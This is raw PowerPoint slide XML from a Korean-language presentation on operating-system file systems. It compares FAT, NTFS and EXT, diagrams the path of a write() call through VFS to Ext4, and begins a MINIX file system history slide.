            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>보안에 취약 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 접근 제어 불가능</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>종류 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: FAT12, FAT16, FAT32 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>최대 표현 가능한 클러스터의 수를 비트 수</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB84960C-E904-4E98-B3F0-A5E75C110592}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4448976" y="2113808"/>
            <a:ext cx="3258422" cy="4043548"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F09456"/>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N T F S</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>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dirty="0"/>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
              <a:t>NT File System</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>전용 파일시스템</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대용량 볼륨에 대한 효과적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디스크 공간의 효과적 사용</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보안과 암호화 또한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파일 접근 속도를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특정 파일이나 디렉토리 자동 압축 기능</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다른 운영체제에서 호환 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>안됌</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>저용량 볼륨에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FAT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>보다 느림</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6FFC123-1B1E-41F4-B844-C0C17D3F16E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7942988" y="2113808"/>
            <a:ext cx="3258422" cy="4043548"/>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E X T</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200"/>
              <a:t>Extended File System</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리눅스 운영체제를 목표로 만들어짐</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MFS-&gt;EXT1-&gt;EXT2-&gt;EXT3-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>EXT4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MSF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>보다 파일 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>쵀대</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 크기</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>이름 크기 등이 보완됨</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 시스템 손상 가능성이 더 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>줄어듬</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err="1"/>
              <a:t>저널링</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>로그</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 만들어서 시스템이 비정상적으로 종료 되었을 경우 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>파일 시스템을 복구</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>하는 기능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공간 할당을 마지막까지 지연하므로 성능이 향상</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="화살표: 오른쪽 13">
            <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47E31B1B-EE25-4462-B797-7D8800029E7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AE272CE7-C6F9-4C13-B3A9-3632F157955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FAD1BF4D-9709-4344-819D-1CCB54C0BA4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84A5013-1500-4458-93B3-B71AE436A1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2D16FB9-245D-41B8-AC72-BA9BA66638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61305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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>파일 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>write()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="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순서</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28AAD373-7753-4C96-B8AC-6E8251D91388}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1496172" y="5513576"/>
            <a:ext cx="9826276"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VFS : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>파일시스템 관련 인터페이스를 사용자 공간 어플리케이션에 제공하는 커널 서브시스템</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>여러 종류의 파일 시스템을 서로 호환해야 하기 때문에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>, VFS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>가 필요함</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>VLS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>는 다양한 파일시스템들이 공존할 수 있도록 공통된 인터페이스를 제공</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="직사각형 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A50CAAA6-B1B6-4348-A091-D9D6A83E0824}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7473409" y="2230868"/>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664" y="2673428"/>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960915" y="2366226"/>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7823330" y="3018733"/>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5946407" y="2381263"/>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5946406" y="2987488"/>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1878827" y="2497031"/>
            <a:ext cx="783470"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6921965" y="3052891"/>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2662297" y="2381262"/>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2662297" y="2686789"/>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50" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3637856" y="2752192"/>
            <a:ext cx="603081" cy="2011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531B8CC0-5AD2-4D88-9129-603576A5BAFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4240937" y="2381262"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="직사각형 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D097177-8885-4C9A-92CE-0CC224A0A39E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4240937" y="2887928"/>
            <a:ext cx="975559" cy="130805"/>
          </a:xfrm>
          <a:prstGeom prst="rec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54A7A739-F8BA-4663-ABD3-D6F129DB0921}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="50" idx="3"/>
            <a:endCxn id="21" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5216496" y="2953331"/>
            <a:ext cx="729910" cy="99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908473" y="2281925"/>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8" name="TextBox 2067">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23C5E139-2562-4FBF-9E93-615B3EDE21C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6200570" y="4120066"/>
            <a:ext cx="659366" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Ext 4</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="TextBox 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{290309C0-CF9C-47FB-BD0B-61DE8CBE524D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1108554">
            <a:off x="3609712" y="2522971"/>
            <a:ext cx="659366" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SystemCall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Write()</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="TextBox 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E26F3793-A531-4CE8-8CA3-6758CCB93D35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1090188" y="2028937"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="TextBox 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9D7DA94-C666-40F1-95E8-7743F9C7837B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1187440">
            <a:off x="1954836" y="2162769"/>
            <a:ext cx="763836" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800"/>
              <a:t>Write </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800"/>
              <a:t>/test/myfile</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>“Helloworld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>!”</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="TextBox 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFEF841B-A835-4033-8B23-3B4C0C6384CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="520473">
            <a:off x="5230864" y="2764817"/>
            <a:ext cx="734008" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>sys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>write()</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C4B194B-7581-4447-857D-94F3A81FC9E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="355509">
            <a:off x="6882339" y="2712093"/>
            <a:ext cx="734008" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Write</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Excute!</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="화살표: 오른쪽 25">
            <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66656E67-162D-4ADE-87C1-02D4B859BC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BCAFB074-312D-44AB-8236-4F3923D97FBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="사각형: 둥근 모서리 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF73414F-336F-4770-8C65-ABFF93D1E6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0F048A5E-B8BC-40E8-B289-D4F975B00F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4" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC87E0C6-EA25-4F0B-9198-7F3F74AEBB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08856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/Theory/T3/History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역사</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E72FE4A-7563-4A5F-AA8C-9E02FBA9393C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="977984" y="1918917"/>
            <a:ext cx="2893625" cy="2263639"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="2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MFS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200"/>
              <a:t>MINIX File System</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IBM PC/AT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>마이크로 컴퓨터 목표</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1990</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>년대 유행</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파일이름은 </a:t>
            </a:r>
            <a:r>
